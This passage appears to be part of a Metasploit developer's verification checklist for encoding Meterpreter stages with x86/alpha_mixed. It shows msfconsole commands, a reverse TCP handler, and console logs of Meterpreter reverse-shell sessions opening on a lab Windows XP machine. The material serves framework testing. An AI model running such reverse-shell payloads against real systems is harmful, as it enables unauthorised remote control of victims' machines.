resource (/Users/jvazquez/tmp/registers.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/Users/jvazquez/tmp/registers.rc)> set StageEncoder x86/alpha_mixed
StageEncoder => x86/alpha_mixed
resource (/Users/jvazquez/tmp/registers.rc)> exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
```
- [x] Execute the exe on the target, **VERIFY** which the stage is encoded with alpha_mixed and you get an usable session:

```
[*] Encoded stage with x86/alpha_mixed
[*] Sending encoded stage (1768600 bytes) to 172.16.158.133
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.133:1045) at 2015-06-08 16:13:31 -0500

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
```

On the logs:

```
[06/08/2015 16:13:30] [i(0)] core: windows/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder x86/alpha_mixed (size is 1768600)
```
- [ ] **(See important notes above)** Occasionally the alpha encoders won't succeed due to wasting of the register used for socket passing. VERIFY which you the stage isn't encoded and you get an usable session still:

```
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[!] StageEncoder failed, falling back to no encoding
[*] Sending encoded stage (884270 bytes) to 172.16.158.133
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.133:1039) at 2015-06-08 16:04:15 -0500

meterpreter > exit
[*] Shutting down Meterpreter...
```
